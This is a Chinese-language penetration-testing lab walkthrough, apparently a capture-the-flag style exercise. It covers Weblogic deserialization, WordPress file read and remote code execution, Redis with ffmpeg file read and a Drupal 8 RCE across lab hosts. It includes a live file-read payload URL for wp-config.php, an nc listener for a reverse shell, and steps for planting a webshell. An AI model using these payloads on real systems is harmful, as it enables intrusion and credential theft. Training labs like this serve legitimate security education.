企业渗透2
实验描述
操作机的操作系统是kali 进入系统后默认是命令行界面 输入startx命令即可打开图形界面。
所有需要用到的信息和工具都放在了/home/Hack 目录下。
本实验的任务是通过外网的两个主机通过代理渗透到内网的两个主机。在渗透的过程中一般需要先进行端口扫描猜测主机上运行的服务,再通过漏洞利用脚本和其他扫描工具进一步确定漏洞存在,进而完成主机渗透拿到权限。
实验目的
Weblogic的java反序列漏洞应用
Wordpress任意文件读取的漏洞利用
Wordpress命令执行的漏洞利用
WordPress通过自己修改的EXP,getshell
通过代理扫描内网
Redis未授权访问以及对配置文件的理解
Ffmpeg任意文件的读取结合redis的利用
Drupal由于YAML解析器处理不当导致远程代码执行
实验环境
操作系统 | IP地址 | 服务器角色 | 登录账户密码 |
---|---|---|---|
Kali Linux | 192.168.2.10 | 操作机 | 用户名:root;密码:Simplexue123 |
Centos 7 | 192.168.2.11 | 目标机 | 用户名:root;密码:Simplexue123 |
Centos 7 | 192.168.1.10 | 目标机 | 用户名:root;密码:Simplexue123 |
Centos 7 | 192.168.1.11 | 目标机 | 用户名:root;密码:Simplexue123 |
Centos 7 | 192.168.2.200 | 目标机 | 用户名:root;密码:Simplexue123 |
任务一 Weblogic反序列化
1 | 整体扫描外部网络,探测暴露在外部的主机信息 |
实验目的
通过完成本实验任务,要求学生掌握利用java反序列化漏洞利用脚本攻击weblogic服务的技术。掌握weblogic服务的常见端口,启动jar程序的方法和攻击weblogic的流程、方法和技巧,为完成后续企业渗透实验任务奠定坚实的漏洞利用技术基础。
打开kal操作机
访问192.168.2.10:7001
打开home/HACK目录下的工具
输入HOST、端口、以及CMD命令
点击connect并执行
根据提示,找到/home/flag下的flag.txt文件
任务二 Wordpress任意文件读取
任务内容:
1 | 使用wpscan工具扫描wordpress的插件漏洞 |
利用wpscan扫描wordpress网站,扫描漏洞插件
命令:wpscan –url 192.168.2.11 –enumerate p
发现插件存在漏洞
根据提示直接上payload
http://192.168.2.11/wp-content/plugins/wp-hide-security-enhancer/router/file-process.ph p?action=style-clean&file_path=/wp-config.php
得到flag
任务三 Wordpress命令执行
任务内容:
1 | 利用Burpsuite的repeater模块修改包探测漏洞存在的字段。 |
操作步骤
1 | 访问目标网站,在浏览器中配置代理,用Burpsuite拦截请求包 |
首先找到登陆入口
对firefox及burpsuite设置代理,拦截请求。
利用提供的脚本getshell,获得flag
任务四 改进漏洞利用脚本获得命令执行权限
实验目标
1 | 了解网络安全漏洞的概念以及现有的安全漏洞扫描工具。认知常见网络安全漏洞。 |
实验步骤
1 | 查看漏洞利用脚本wordpress-rce-exploit.sh理解脚本改进的原理。 |
首先查看脚本内容
修改recv_host=”192.168.2.200”
设置监听端口
nc –lvvp 7777
反弹shell
任务五 redis未授权访问+ffmpeg 任意文件读取
任务内容:
1 | 查看网页中的信息可知,是通过ffmpeg处理视频的小应用,只有上传,下载和删除功能,此处存在ffmpeg文件读取漏洞,构造特定的avi视频,经过ffmpeg处理之后的视频就会包含想要的文件内容。利用文件读取漏洞获取redis配置文件内容。 |
任务六 drupal8远程代码执行
1 | 使用浏览器挂代理访问内网机器192.168.1.10。 |
实验目标
1 | 了解网络安全漏洞的概念以及现有的安全漏洞扫描工具。认知常见网络安全漏洞。 |
操作步骤
1 | 使用浏览器结合proxychains用之前的代理访问内网中的drupal8的web应用。 |
然后利用exp写入webshell
中国菜刀连接,即可获得flag。